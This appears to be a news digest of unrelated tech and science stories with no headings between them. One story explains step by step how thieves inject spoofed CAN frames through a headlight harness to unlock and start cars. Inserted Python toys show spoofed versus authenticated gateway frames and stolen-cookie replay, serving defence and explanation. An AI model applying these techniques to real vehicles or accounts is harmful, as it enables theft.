A Cornell University researcher has developed sonar glasses that “hear” you without speaking. The eyeglass attachment uses tiny microphones and speakers to read the words you mouth as you silently command it to pause or skip a music track, enter a passcode without touching your phone or work on CAD models without a keyboard.
Cornell Ph.D. student Ruidong Zhang developed the system, which builds off a similar project the team created using a wireless earbud — and models before that which relied on cameras. The glasses form factor removes the need to face a camera or put something in your ear. “Most technology in silent-speech recognition is limited to a select set of predetermined commands and requires the user to face or wear a camera, which is neither practical nor feasible,” said Cheng Zhang, Cornell assistant professor of information science. “We’re moving sonar onto the body.”
The researchers say the system only requires a few minutes of training data (for example, reading a series of numbers) to learn a user’s speech patterns. Then, once it’s ready to work, it sends and receives sound waves across your face, sensing mouth movements while using a deep learning algorithm to analyze echo profiles in real time “with about 95 percent accuracy.”
The system does this while offloading data processing (wirelessly) to your smartphone, allowing the accessory to remain small and unobtrusive. The current version offers around 10 hours of battery life for acoustic sensing. Additionally, the researchers say no data leaves your phone, which addresses the main privacy concern with a body-worn sensor. “We’re very excited about this system because it really pushes the field forward on performance and privacy,” said Cheng Zhang. “It’s small, low-power and privacy-sensitive, which are all important features for deploying new, wearable technologies in the real world.”
Shadetree hackers—or, as they’re more commonly called, tech-savvy thieves—have found a new way to steal cars. No, it’s not a relay attack, Bluetooth exploit, key fob replay, or even a USB cable. Instead, these thieves are performing a modern take on hot-wiring without ever ripping apart the steering column.
Crafty criminals have resorted to using specially crafted devices that simply plug into the wiring harness behind the headlight of a victim’s car. Once they’re plugged in, they’re able to unlock, start, and drive away before the owner even catches wind of what’s going on.
Last year, Ian Tabor, who runs the UK chapter of Car Hacking Village, had his Toyota RAV4 stolen from outside of his home near London. Days prior to the theft, he found that thieves had damaged his car without successfully taking it. It wasn’t quite clear if it was a case of vandalism, or if the thieves had tried to make off with the car’s front bumper, but he did notice that the headlight harness had been yanked out.
Ultimately, his car wound up missing when thieves successfully made away with it. And after Tabor’s car was stolen, so was his neighbor’s Toyota Land Cruiser. But, folks, this is 2023. It’s not like you can just hotwire a car and drive away as the movies suggest. This got Tabor curious—after all, hacking cars is something he does for fun. How exactly did the thieves make off with his car?
Tabor got to work with Toyota’s “MyT” app. This is Toyota’s telematics system, which sends Diagnostic Trouble Codes (DTCs) up to the automaker’s servers rather than forcing you to plug a code reader into the car’s OBD2 port. Upon investigation, Tabor noticed that his RAV4 had logged a ton of DTCs just prior to being stolen, one of which was for the computer that controls the car’s exterior lighting.
This led Tabor to wonder if the thieves somehow made use of the vehicle CAN Bus network to drive away with his car. After scouring the dark web, Tabor was able to locate expensive tools claiming to work for various automakers and models, including BMW, Cadillac, Chrysler, Fiat, Ford, GMC, Honda, Jeep, Jaguar, Lexus, Maserati, Nissan, Toyota, as well as Volkswagen. The cost? As much as $5,400, but that’s a drop in the bucket if they can actually deliver on the promise of enabling vehicle theft.
Tabor decided to order one of these devices to try out himself. Together with Ken Tindell, the CTO of Canis Automotive Labs, he tore the device down to find out what made it tick, and the two published a writeup of their findings.
As it turns out, the expensive device consisted of just $10 in components. The real magic is in the programming, which injects fake CAN messages into the car’s actual CAN Bus network. The messages tricked the car into thinking a trusted key was present, which convinced the CAN Gateway (the component that filters CAN messages between the car’s segmented networks) to forward messages instructing the car to disable its immobilizer and unlock the doors, so the thieves could simply drive away.
What’s more, is that the device simply looked like an ordinary portable speaker. The guts were stuffed inside the shell of a JBL-branded Bluetooth speaker, and all the thief needs to do is simply power the device on.
Once the device is on and plugged in, it wakes up the CAN network by sending a frame, much as pulling on a door handle, approaching with a passive entry key, or pressing a button on your fob would. It then listens for a specific CAN message before beginning its attack. The device then emulates a hardware error, which tricks the other ECUs on the CAN network into ceasing transmission so that the attacking device has the bus to itself for its spoofed messages.
The pause of valid messages is when the device is able to go into attack mode. It then sends the spoofed “valid key present” messages to the gateway which makes the car think that an actual valid key is being used to control the vehicle. Next, the attacker simply presses the speaker’s “play” button, and the car’s doors are unlocked.
Given that the manufacturer of these CAN injection devices claims they are effective against such a wide range of makes and models, this looks like an industry-wide problem that may take some brainstorming to fix. The root cause is not specific to any one automaker: a classic CAN frame carries an arbitration ID and a payload but nothing that identifies which ECU sent it, so any device electrically on the bus, including one spliced into a headlight harness, can transmit frames with whatever ID it likes and the receiving ECUs cannot tell the difference.
The good news is that this type of attack can be thwarted. While there are quick-and-dirty methods that could be re-defeated in the long run, an automaker can prevent it by encrypting its CAN Bus traffic so that frames the attacker cannot produce are rejected. According to Tindell, Canis is working on a project to retrofit U.S. military vehicles with such an encryption scheme, which is the fix he suggests for commercial vehicles experiencing this issue.
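The following is an added illustration, not code from Tabor and Tindell’s writeup or from any automaker, of the two gateway behaviours the article contrasts: a gateway that forwards on arbitration ID alone, which accepts the injected “valid key present” frame, and one that requires each status frame to carry a truncated HMAC tag plus a monotonic counter, which rejects both the spoofed frame and a replayed genuine one. It goes slightly beyond the article’s wording in one respect: what defeats injection is that the receiver can verify who produced a frame (authentication), not that the payload is hidden, which is why the example uses a MAC rather than encryption; AUTOSAR SecOC uses the same truncated-MAC-plus-freshness-counter pattern on real vehicles. The arbitration IDs, the payload layout (2-byte status, 2-byte counter, 4-byte tag) and the shared key are all made up for the example.

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass

# Hypothetical arbitration IDs and key (classic CAN: 11-bit IDs, <= 8 data bytes).
# Real IDs are vehicle-specific and are not given in the article.
ID_KEY_STATUS = 0x123            # body ECU -> gateway: key/immobilizer status
STATUS_KEY_VALID = b"\x01\x00"   # 2-byte status meaning "valid key present"
SHARED_KEY = b"example-key-do-not-use"  # would be provisioned per vehicle


@dataclass(frozen=True)
class Frame:
    arb_id: int
    data: bytes

    def __post_init__(self):
        if not 0 <= self.arb_id <= 0x7FF or len(self.data) > 8:
            raise ValueError("not a valid classic CAN frame")


class NaiveGateway:
    """Forwards frames between bus segments based only on arbitration ID.
    Any node on the reachable segment (here, the headlight harness) can
    originate a frame with ID_KEY_STATUS and the gateway cannot tell."""

    def __init__(self, allowed_ids):
        self.allowed = frozenset(allowed_ids)
        self.key_present = False

    def receive(self, frame: Frame) -> bool:
        """Return True if the frame was accepted and forwarded."""
        if frame.arb_id not in self.allowed:
            return False
        if frame.arb_id == ID_KEY_STATUS and frame.data[:2] == STATUS_KEY_VALID:
            self.key_present = True  # no way to know who sent it
        return True


class AuthenticatedGateway(NaiveGateway):
    """Same ID filtering, but a status frame must be laid out as
    status(2) || counter(2, big-endian) || tag(4), with
    tag = HMAC-SHA256(key, id || counter || status)[:4].
    The monotonic counter makes a captured frame useless for replay."""

    TAG_LEN = 4

    def __init__(self, allowed_ids, key: bytes):
        super().__init__(allowed_ids)
        self.key = key
        self.last_counter = -1

    @staticmethod
    def tag(key: bytes, arb_id: int, counter: int, status: bytes) -> bytes:
        msg = struct.pack(">HH", arb_id, counter) + status
        return hmac.new(key, msg, hashlib.sha256).digest()[:AuthenticatedGateway.TAG_LEN]

    def receive(self, frame: Frame) -> bool:
        if frame.arb_id not in self.allowed:
            return False
        if frame.arb_id != ID_KEY_STATUS:
            return True  # other traffic is passed as before
        if len(frame.data) != 2 + 2 + self.TAG_LEN:
            return False
        status = frame.data[:2]
        counter = struct.unpack(">H", frame.data[2:4])[0]
        tag = frame.data[4:]
        if counter <= self.last_counter:
            return False  # stale or replayed
        expected = self.tag(self.key, frame.arb_id, counter, status)
        if not hmac.compare_digest(tag, expected):
            return False  # forged: the sender does not hold the key
        self.last_counter = counter
        if status == STATUS_KEY_VALID:
            self.key_present = True
        return True


def authenticated_status(key: bytes, counter: int, status: bytes) -> Frame:
    """What a legitimate body ECU would transmit."""
    tag = AuthenticatedGateway.tag(key, ID_KEY_STATUS, counter, status)
    return Frame(ID_KEY_STATUS, status + struct.pack(">H", counter) + tag)


def spoofed_status() -> Frame:
    """What the injection device sends: the right ID and a 'key valid'
    payload padded to 8 bytes, but no valid tag because it has no key."""
    return Frame(ID_KEY_STATUS, STATUS_KEY_VALID + b"\x00" * 6)


def naive_gateway_fooled() -> bool:
    gw = NaiveGateway([ID_KEY_STATUS])
    gw.receive(spoofed_status())
    return gw.key_present


def authenticated_gateway_fooled() -> bool:
    gw = AuthenticatedGateway([ID_KEY_STATUS], SHARED_KEY)
    gw.receive(spoofed_status())
    return gw.key_present


def replay_rejected() -> bool:
    """A genuine frame captured earlier and re-sent must not be accepted."""
    gw = AuthenticatedGateway([ID_KEY_STATUS], SHARED_KEY)
    genuine = authenticated_status(SHARED_KEY, counter=7, status=STATUS_KEY_VALID)
    first = gw.receive(genuine)
    gw.key_present = False
    second = gw.receive(genuine)  # same counter as before: rejected
    return first and not second and not gw.key_present


if __name__ == "__main__":
    print("naive gateway accepts spoof:", naive_gateway_fooled())                  # True
    print("authenticated gateway accepts spoof:", authenticated_gateway_fooled())  # False
    print("replay of a genuine frame rejected:", replay_rejected())                # True
```

The 4-byte tag is a compromise forced by the 8-byte classic CAN payload; a real deployment also has to handle counter resynchronisation after an ECU reset and key provisioning at the factory, which the example leaves out.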
Several law enforcement agencies have teamed up to take down Genesis Market, a website selling access to “over 80 million account access credentials,” which included the standard usernames and passwords, as well as much more dangerous data like session tokens. According to a press release from the US Department of Justice, the site was seized on Tuesday. The European Union Agency for Law Enforcement Cooperation (or Europol) says that 119 of the site’s users have been arrested.
Genesis Marketplace has been around since 2018, according to the Department of Justice, and was “one of the most prolific initial access brokers (IABs) in the cybercrime world.” It let hackers search for certain types of credentials, such as ones for social media accounts, bank accounts, etc., as well as search for credentials based on where in the world they came from.
The agencies have teamed up with HaveIBeenPwned.com to make it easy for the public to check if their login credentials were stolen, and I’d highly recommend doing so — because of the way Genesis worked, this isn’t the typical “just change your password and you’ll be fine” scenario. For instructions on how to check whether Genesis was selling your stolen info, check out the writeup from Troy Hunt, who runs HaveIBeenPwned.
(The TL;DR is that you should sign up for HIBP’s email notification service with all of your important email addresses, and then be sure to click the “Verify email” button in the confirmation email. Just searching for your email on the site won’t tell you if you were impacted.)
[…]
While Genesis Marketplace traded in usernames and passwords, it also sold access to users’ cookies and browser fingerprints as well, which could let hackers bypass protections like two-factor authentication. Cookies — or login tokens, to be specific — are files that websites store on your computer to show that you’ve already logged in by correctly entering your password and two-factor authentication information. They’re the reason you don’t have to log into a website each time you visit it. (They’re also the reason that the joint effort to take down Genesis was given the delightful codename “Operation Cookie Monster.”)
[…]
Genesis stole the fingerprints, too. What’s more, it even provided a browser extension that let hackers spoof the victim’s fingerprint while using their login cookie to gain access to an account, according to a 2019 report from ZDNET.
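The following is an added example, not code from Genesis, HaveIBeenPwned or the article, showing why a stolen login cookie is worse than a stolen password and why “just change your password” is not enough. It is a toy backend with made-up user names, fingerprints and timestamps: login issues an opaque bearer cookie, later requests are trusted on that cookie alone, and a crude fingerprint check is defeated as soon as the attacker presents the victim’s fingerprint, which is exactly what the spoofing extension described above provides. The one server-side choice that evicts the attacker is invalidating every session issued before the password change.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass


@dataclass
class Session:
    user: str
    fingerprint: str   # browser fingerprint (hash) seen at login
    issued_at: float
    generation: int    # the user's password generation when issued


class Site:
    """Toy backend: password (+2FA, assumed done) login issues a bearer cookie;
    later requests are trusted on the cookie alone, as on a real site.
    Constructed for illustration; not any real site's code."""

    SESSION_TTL = 30 * 24 * 3600  # seconds; long-lived "remember me" cookie

    def __init__(self, revoke_on_password_change: bool):
        self.revoke_on_password_change = revoke_on_password_change
        self.users = {}      # user -> [salt, pbkdf2 digest, password generation]
        self.sessions = {}   # cookie value -> Session

    @staticmethod
    def _digest(salt: bytes, password: str) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def register(self, user: str, password: str) -> None:
        salt = os.urandom(16)
        self.users[user] = [salt, self._digest(salt, password), 0]

    def login(self, user: str, password: str, fingerprint: str, now: float):
        salt, digest, generation = self.users[user]
        if not hmac.compare_digest(digest, self._digest(salt, password)):
            return None
        cookie = os.urandom(32).hex()   # opaque, unguessable session ID
        self.sessions[cookie] = Session(user, fingerprint, now, generation)
        return cookie

    def change_password(self, user: str, new_password: str) -> None:
        salt = os.urandom(16)
        generation = self.users[user][2] + 1
        self.users[user] = [salt, self._digest(salt, new_password), generation]

    def request(self, cookie: str, fingerprint: str, now: float):
        """Return the user the cookie authenticates, or None."""
        s = self.sessions.get(cookie)
        if s is None or now - s.issued_at > self.SESSION_TTL:
            return None
        if s.fingerprint != fingerprint:
            return None  # crude device binding; a spoofed fingerprint passes it
        if self.revoke_on_password_change and s.generation != self.users[s.user][2]:
            return None  # issued under an older password: treat as revoked
        return s.user


def attacker_with_stolen_cookie(revoke_on_password_change: bool):
    """Replay the victim's cookie and fingerprint (what a Genesis buyer held)
    before and after the victim changes their password.
    Returns (before, after): whether the attacker was authenticated each time."""
    t0 = 1_700_000_000.0
    site = Site(revoke_on_password_change)
    site.register("victim", "correct horse battery staple")
    cookie = site.login("victim", "correct horse battery staple", "fp-victim-browser", t0)

    # Infostealer exfiltrates cookie + fingerprint; attacker uses both an hour later.
    # The password and second factor are never needed.
    before = site.request(cookie, "fp-victim-browser", t0 + 3600) == "victim"

    # Victim learns of the breach and only changes the password.
    site.change_password("victim", "a different passphrase")
    after = site.request(cookie, "fp-victim-browser", t0 + 7200) == "victim"
    return before, after


def attacker_without_fingerprint_spoofing() -> bool:
    """Same stolen cookie, presented from the attacker's own browser fingerprint."""
    t0 = 1_700_000_000.0
    site = Site(revoke_on_password_change=False)
    site.register("victim", "pw")
    cookie = site.login("victim", "pw", "fp-victim-browser", t0)
    return site.request(cookie, "fp-attacker-browser", t0 + 60) == "victim"


if __name__ == "__main__":
    print(attacker_with_stolen_cookie(revoke_on_password_change=False))  # (True, True)
    print(attacker_with_stolen_cookie(revoke_on_password_change=True))   # (True, False)
    print(attacker_without_fingerprint_spoofing())                        # False
```

From the user’s side the equivalent action is the “sign out of all devices” control a site offers; from the operator’s side, revoking outstanding sessions on password change and keeping session lifetimes short are what turn a credential change into an actual eviction.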
A unit of the Russian military intelligence service GRU has hacked routers belonging to Dutch private individuals and small and medium-sized companies. The Military Intelligence and Security Service (MIVD) discovered this, de Volkskrant writes.
The routers are part of a worldwide attack network that can, for example, be used to disrupt or paralyze the networks of ministries. It is estimated that thousands of hacked devices worldwide are in the hands of the Russian unit. In the Netherlands, several dozen routers are said to be involved.
The hacked devices are higher-end routers of the kind often found at small businesses. The Russian unit takes over the routers and can monitor and control them, investigative journalist Huib Modderkolk told NOS Radio 1 Journaal.
According to him, the unit was created for sabotage: “It is also called the most dangerous hacking group in the world.”
‘We know what you’re doing’
The MIVD discovered the digital attack because it saw many Dutch IP addresses involved. According to Modderkolk, the victims often do not realize they have been hacked. Routers left on their default settings or protected with a simple password are easy to compromise. The individuals and companies affected have now been informed by the MIVD.
It is striking that the MIVD is making this information public: “They hope for more awareness that this is actually going on, but the aim is also to let the Russians know: ‘we know what you are doing’.” According to Modderkolk, this is a development of recent years; the British and Americans are also increasingly disclosing this type of sensitive information.
Disinformation and cyber threats
The National Coordinator for Counterterrorism and Security (NCTV) has already warned of disinformation and cyber threats in connection with the war in Ukraine. Such cyber attacks could affect the communication systems of banks or hospitals, among others. At the moment there are no specific threats, but given the rapid developments in the war, this could change quickly.
It is not clear whether the Russian group’s hacking campaign is related to the war in Ukraine.
Human memory might be even more unreliable than currently thought. In a new study, scientists found that it’s possible for people to form false memories of an event within seconds of it occurring. This almost-immediate misremembering seems to be shaped by our expectations of what should happen, the team says.
[…]
They recruited hundreds of volunteers over a series of four experiments to complete a task: They would look at certain letters and then be asked to recall one highlighted letter right after. However, the scientists used letters that were sometimes reversed in orientation, so the volunteers had to remember whether their selection was mirrored or not (for example, correctly identifying whether they saw c vs ↄ). They also focused on the volunteers who were highly confident about their choices during the task.
Overall, the participants regularly misremembered the letters, but in a specific way. People were generally good at remembering when a typical letter was shown, with their inaccuracy rates hovering around 10%. But they were substantially worse at remembering a mirrored letter, with inaccuracy rates up to 40% in some experiments. And, interestingly enough, their memory got worse the longer they had to wait before recalling it. When they were asked to recall what they saw a half second later, for instance, they were wrong less than 20% of the time, but when they were asked three seconds later, the rate rose as high as 30%.
According to Otten, the findings—published Wednesday in PLOS One—indicate that our memory starts being shaped almost immediately by our preconceptions. People expect to see a regular letter, and are not easily fooled into misremembering one as mirrored. But when the unexpected happens and a mirrored letter appears, we often still default to that prior expectation and recall a regular one. This bias doesn’t seem to kick in instantaneously, though, since people’s short-term memory was better when they had to be especially quick on their feet.
“It is only when memory becomes less reliable through the passage of a tiny bit of time, or the addition of extra visual information, that internal expectations about the world start playing a role,” Otten said.
Some users of Microsoft’s free Outlook hosted service are finding they can no longer send or receive emails because of how the Windows giant now calculates the storage of attachments.
Microsoft account holders are allowed to hold up to 15GB in their cloud-hosted email, which until recently included text and attachments, and 5GB in their OneDrive storage. That policy changed February 1. Since then, attachments now count as part of the 5GB OneDrive allowance – and if that amount is exceeded, it throws a wrench into the email service.
It doesn’t change the storage amount available in Outlook.com, but could in OneDrive.
“This update may reduce how much cloud storage you have available to use with your OneDrive,” Microsoft wrote in a support note posted before the change. “If you reach your cloud storage quota, your ability to send and receive emails in Outlook.com will be disrupted.”
Redmond added that the plan was to gradually roll out the cloud storage changes and new quota bar starting February 1 across users’ app and Windows settings and Microsoft accounts. Two months later, that gradual rollout is beginning to hit more and more users.
One reader told The Register that his Outlook recently stopped working and indicated that he had surpassed the 5GB storage limit, reaching 6.1GB. He was unaware of the policy change, so he was confused when he saw that in his email account he had used only 6.8GB of the 15GB allowed.
It was the change in how attachments are added that tripped him up. Microsoft told him about the new policy.
“So instantly, I have lost 10GB of email capacity and because my attachments were greater than 5GB that instantly disabled my email and triggered bounce-backs (even sending and receiving with no attachments),” the reader told us.
“No one deletes attachments every time an email is received. This is like blackmail. MS is forcing us to buy a subscription by the back door or to have to delete emails with attachments on a regular basis ad infinitum.”
He isn’t the only one perplexed by the issue.
[…]
One who apparently was unaware that it was the attachments shifting over to OneDrive causing the email problems deleted a lot of emails, only to find it didn’t change the “storage used” amount.
“We could see inside people’s garages and their private properties,” a former employee told Reuters. “Let’s say that a Tesla customer had something in their garage that was distinctive, you know, people would post those kinds of things.”
One office in particular, located in San Mateo, reportedly had a “free-wheeling” atmosphere, where employees would share videos and images with wild abandon. These pics or vids would often be “marked-up” via Adobe Photoshop, former employees said, converting drivers’ personal experiences into memes that would circulate throughout the office.
“The people who buy the car, I don’t think they know that their privacy is, like, not respected,” one former employee was quoted as saying. “We could see them doing laundry and really intimate things. We could see their kids.”
Another former employee seemed to admit that all of this was very uncool: “It was a breach of privacy, to be honest. And I always joked that I would never buy a Tesla after seeing how they treated some of these people,” the employee told the news outlet. Yes, it’s always a vote of confidence when a company’s own employees won’t use the products that they sell.
Privacy concerns related to Tesla’s data-guzzling autos aren’t exactly new. Back in 2021, the Chinese government formally banned the vehicles on the premises of certain military installations, calling the company a “national security” threat. The Chinese were worried that the cars’ sensors and cameras could be used to funnel data out of China and back to the U.S. for the purposes of espionage. Beijing seems to have been on to something—although it might be the case that the spying threat comes less from America’s spooks than it does from bored slackers back at Tesla HQ.
One of the reasons that Tesla’s cameras seem so creepy is that you can never really tell if they’re on or not. A couple of years ago, a stationary Tesla helped catch a suspect in a Massachusetts hate crime, when its security system captured images of the man slashing tires in the parking lot of a predominantly Black church. The man was later arrested on the basis of the photos.
Reuters notes that it wasn’t ultimately “able to determine if the practice of sharing recordings, which occurred within some parts of Tesla as recently as last year, continues today or how widespread it was.”
With all this in mind, you might as well always assume that your Tesla is watching, right? And, now that Reuters’ story has come out, you should also probably assume that some bored coder is also watching—potentially in the hopes of converting your dopiest in-car moment into a meme.
Private camera recordings, captured by cars, were shared in chat rooms: ex-workers
Circulated clips included one of child being hit by car: ex-employees
Tesla says recordings made by vehicle cameras ‘remain anonymous’
One video showed submersible vehicle from James Bond film, owned by Elon Musk
LONDON/SAN FRANCISCO, April 6 (Reuters) – Tesla Inc assures its millions of electric car owners that their privacy “is and will always be enormously important to us.” The cameras it builds into vehicles to assist driving, it notes on its website, are “designed from the ground up to protect your privacy.”
But between 2019 and 2022, groups of Tesla employees privately shared via an internal messaging system sometimes highly invasive videos and images recorded by customers’ car cameras, according to interviews by Reuters with nine former employees.
Some of the recordings caught Tesla customers in embarrassing situations. One ex-employee described a video of a man approaching a vehicle completely naked.
Also shared: crashes and road-rage incidents. One crash video in 2021 showed a Tesla driving at high speed in a residential area hitting a child riding a bike, according to another ex-employee. The child flew in one direction, the bike in another. The video spread around a Tesla office in San Mateo, California, via private one-on-one chats, “like wildfire,” the ex-employee said.
Other images were more mundane, such as pictures of dogs and funny road signs that employees made into memes by embellishing them with amusing captions or commentary, before posting them in private group chats. While some postings were only shared between two employees, others could be seen by scores of them, according to several ex-employees.
Tesla states in its online “Customer Privacy Notice” that its “camera recordings remain anonymous and are not linked to you or your vehicle.” But seven former employees told Reuters the computer program they used at work could show the location of recordings – which potentially could reveal where a Tesla owner lived.
One ex-employee also said that some recordings appeared to have been made when cars were parked and turned off. Several years ago, Tesla would receive video recordings from its vehicles even when they were off, if owners gave consent. It has since stopped doing so.
“We could see inside people’s garages and their private properties,” said another former employee. “Let’s say that a Tesla customer had something in their garage that was distinctive, you know, people would post those kinds of things.”
Tesla didn’t respond to detailed questions sent to the company for this report.
About three years ago, some employees stumbled upon and shared a video of a unique submersible vehicle parked inside a garage, according to two people who viewed it. Nicknamed “Wet Nellie,” the white Lotus Esprit sub had been featured in the 1977 James Bond film, “The Spy Who Loved Me.”
The vehicle’s owner: Tesla Chief Executive Elon Musk, who had bought it for about $968,000 at an auction in 2013. It is not clear whether Musk was aware of the video or that it had been shared.
To report this story, Reuters contacted more than 300 former Tesla employees who had worked at the company over the past nine years and were involved in developing its self-driving system. More than a dozen agreed to answer questions, all speaking on condition of anonymity.
Reuters wasn’t able to obtain any of the shared videos or images, which ex-employees said they hadn’t kept. The news agency also wasn’t able to determine if the practice of sharing recordings, which occurred within some parts of Tesla as recently as last year, continues today or how widespread it was. Some former employees contacted said the only sharing they observed was for legitimate work purposes, such as seeking assistance from colleagues or supervisors.
In a future fight, control of advanced drones belonging to the U.S. Navy and U.S. Air Force could be passed back and forth between assets from either service as the situation demands. Uncrewed platforms are set to make up the majority of the Navy’s future carrier air wings, with up to 60 percent of all aircraft on each flattop eventually being pilotless.
Navy Rear Adm. Andrew “Bucket” Loiselle provided details on the service’s advanced aviation plans, including new drones and sixth-generation crewed stealth combat jets, and cooperation with the Air Force on these efforts during a panel discussion yesterday at the Navy League’s annual Sea-Air-Space conference and exhibition. These efforts are part of the service’s broader Next Generation Air Dominance (NGAD) program that you can learn about here. Loiselle is currently the director of the Air Warfare Division, also referred to as N98, within the Office of the Chief of Naval Operations.
[…]
“As we looked upon that air wing of the future, we have numerous unmanned systems,” Loiselle said. “You’ve heard talk about CCAs [and] MQ-25.”
CCA stands for Collaborative Combat Aircraft and is a term that originated with the Air Force to describe future advanced drones with high degrees of autonomy intended to operate collaboratively with crewed platforms. Secretary of the Air Force Frank Kendall announced earlier this year that the service had begun doing future planning around a fleet of at least 1,000 CCAs, as well as 200 crewed sixth-generation stealth combat jets, all being developed as part of its own separate multi-faceted NGAD program. The CCA figure was based on a notional concept of operations that would pair two of the drones with each of the 200 NGAD combat jets and 300 stealthy F-35A Joint Strike Fighters.
However, the Air Force is still very much refining its CCA fleet structure plans, which could grow to include an even larger total number of CCAs with different types geared toward different mission sets. It’s also still figuring out how it intends to deploy and employ them. The Navy appears to be doing much the same, in increasingly close coordination with the Air Force.
“We’re developing an unmanned control station that’s already installed on three aircraft carriers, and that will be the control station for any UAS [uncrewed aerial systems] that we buy,” Rear Adm. Loiselle added. “[There is] unbelievable cooperation with the Air Force right now in the development of mission systems for both sixth-gen [combat jets] and CCAs… I’m very close to getting a signed agreement with the Air Force where we’re going to have the ability for the Navy to control Air Force CCAs and the Air Force to control Navy CCAs.”
The Navy has previously said that the MQ-25 would be deployed first on the Nimitz class carriers USS Dwight D. Eisenhower and USS George H.W. Bush, and the latter ship has been actively used for testing that drone. It was announced last year that the plans had changed and that USS Theodore Roosevelt, another Nimitz class ship, would be the first to host the Stingray.
The expectation is that future CCAs will also be able to be controlled by various aircraft in the course of operations. The Navy has specifically said in the past that one of the core missions for its future sixth-generation crewed combat jet, also referred to as F/A-XX, will be acting as a “quarterback” for drones.
For the Navy and the Air Force, being able to readily exchange control of future drones will be key to ensuring operational flexibility. During the panel discussion yesterday, Rear Adm. Loiselle outlined a broader future naval vision where this capability could be particularly valuable.
[…]
“The bottom line is when we’re building our future force that’s going to be 60 percent unmanned, then we’re going to look different than we do today. And we are no longer going to have a fighting force that has 44 strike fighters on the deck, because that’s incompatible with a 60 percent unmanned air wing,” the rear admiral explained. “So we’re going to have to change the narrative, from 44 strike fighters to how many targets can I get at what range at what time intervals, because that’s the true metric that matters.”
“The type of platform that delivers that ordnance is less important than the ability to do so,” he continued. “So we need to look at the entire portfolio that is present within the carrier strike group and how we generate that effect. Equally, we need to be cognizant of what’s available in the joint force, such that we don’t duplicate capabilities that would work within our part of that plan execution.”
[…]
With all this in mind, carrier strike groups, as well as potentially other naval assets, being able to readily take control of Air Force drones during operations in certain circumstances, and vice versa, could be extremely useful. A Navy carrier air wing or Air Force elements in the same region might be able to provide more on-demand escorts or other support for each other’s crewed platforms, including tactical combat jets and larger aircraft like bombers, tankers, and airlifters. Current and future Air Force assets capable of flying very long distances themselves, such as the forthcoming B-21 Raider stealth bomber, could even take control of Navy uncrewed aircraft using more localized line-of-sight links to help with their immediate missions, too.
For instance, long-range Air Force platforms like the B-21 could ‘pick up’ CCAs launched from a carrier operating far forward of any land base. They would then fly their mission into contested airspace with the help of their unmanned wingmen, then return them back to Navy control once they head back out of the high-threat area and towards the carrier’s area of operation. Unmanned tactical aircraft have a significant range advantage over their manned counterparts, which is a factor as well.
Beyond this, just being able to share fleets when in the air between the services opens up huge possibilities and operational synergies.
An Australian engineering company has created a cardboard drone that runs on open source software, standard hardware, and can be assembled and flown with no prior experience.
The Corvo Precision Payload Delivery System (PPDS) costs less than $3,500 apiece, a price made possible by the craft’s use of FOSS and commercial-off-the-shelf hardware.
Michael Partridge, SYPAQ’s general manager for Innovation & Strategic Programs (I&SP), told The Register that Corvo uses ArduPilot autopilot software, unspecified hardware that SYPAQ customizes, and waxed cardboard.
The drone takes around an hour to assemble, we’re told, and its lithium-ion batteries give it a range of up to 100km (62 miles) with a 3kg (6.6lb) payload.
The craft ships in a flat pack complete with tape, glue, and instructions on how to assemble it. A tablet computer is also included so users can tell Corvo where to fly by entering GPS coordinates. A wired connection to upload that flight plan is required, but once Corvo is aloft, it will proceed along its route, at a specified altitude, and land itself at its determined destination.
Partridge declined to discuss details of the tech on board the drones for operational reasons but said SYPAQ has ensured that flight plans are encrypted so that if a Corvo is captured, the location of its pilots can’t be retrieved.
SYPAQ will happily ship a single Corvo, but also offers a “capability pack” that includes multiple craft, spares, and the slingshot-powered launch ramp the craft needs to get airborne.
Partridge said single Corvo units have survived more than 20 flights and that the waxed cardboard wing can handle moisture well, without losing its aerodynamic qualities.
Users in the Ukrainian armed forces have adapted the craft to different roles too. Partridge said adding a camera requires some light hacking – of the drone’s cardboard airframe.
“It has a cargo bay [and] you can do whatever you want in there within the 3kg payload. You can cut a hole through the aircraft to look through it and insert a camera.”
For now, SYPAQ hasn’t given Corvo’s onboard computer wireless capabilities, partly to reduce cost and partly to ensure stealth. But Partridge said Corvos have carried action cameras like the GoPro and users are happy to retrieve removable media once the plane lands. SYPAQ is working on payloads that allow wireless transmission of images, possibly over long distances.
[…] The behavior of the 248 Siberian tigers observed through a personality test showed that the endangered cats had unique traits influencing both their success in reproduction and survival, researchers reported in the journal Royal Society Open Science.
“We found that tigers are very individual, and that people who’ve worked with them and know them well see their individual personalities,” co-author Rosalind Arden of the London School of Economics told AFP.
The study adapted a commonly used human personality test to explore tiger traits such as confidence, sincerity, bullying and savagery in two separate populations of tigers held in semi-captivity in China.
Questionnaires with a list of 70 personality indicators were filled out by veterinarians and feeders who work with the tigers on a daily basis.
The combined results found that both tiger populations displayed characteristics that fell into two overarching personality categories: majesty and steadiness.
Tigers scoring higher for “majesty” were healthier, preyed more on live animals, and ate and mated more.
They were also “regarded by their human raters as having higher group status among tigers,” the study said.
But being collaborative and gentler had its evolutionary benefits too: “steady” tigers were shown to be gentler, more sincere and more loving.
Such traits may play a role in the unusual length of time—two to three years—that tiger cubs remain with their mothers.
The study found very few sex-related differences in tigers’ personalities, however, and father tigers have also been observed taking part in raising their young.
“It’s pleasant to see that you don’t have to be dominant, fierce, competitive and aggressive in order to succeed as a tiger,” said Arden.
Similar studies illuminating the personality and mental abilities of primates have helped humanize them, Arden said.
“There is evidence that it does, in fact, improve animal welfare and conservation,” she added.
Siberian tigers are endangered due to poaching and habitat loss. Only around 500 remain living in the wild.
More information: Rosalind Arden et al, Majestic tigers: personality structure in the great Amur cat, Royal Society Open Science (2023). DOI: 10.1098/rsos.220957
Osmotic energy is a renewable energy with zero emissions and minimal daily variations. However, the membranes for osmotic energy harvesting must have multiple properties that are thought to be impossible to realize to make this technology viable. Here, we show that cartilage-inspired cation-selective composite membranes assembled from aramid nanofibers and boron nitride nanosheets, produced by a layer-by-layer assembly technology, make it possible. The osmotic energy can be harvested by both salt concentration gradient and pressure-driven streaming because of the high mechanical and transport characteristics of the membranes. The combination of high strength, toughness, chemical resilience, rapid ion transport, and structural versatility of aramid-boron nitride composites makes them a promising candidate for osmotic energy harvesting under realistic operational conditions and life-cycle requirements.
Summary
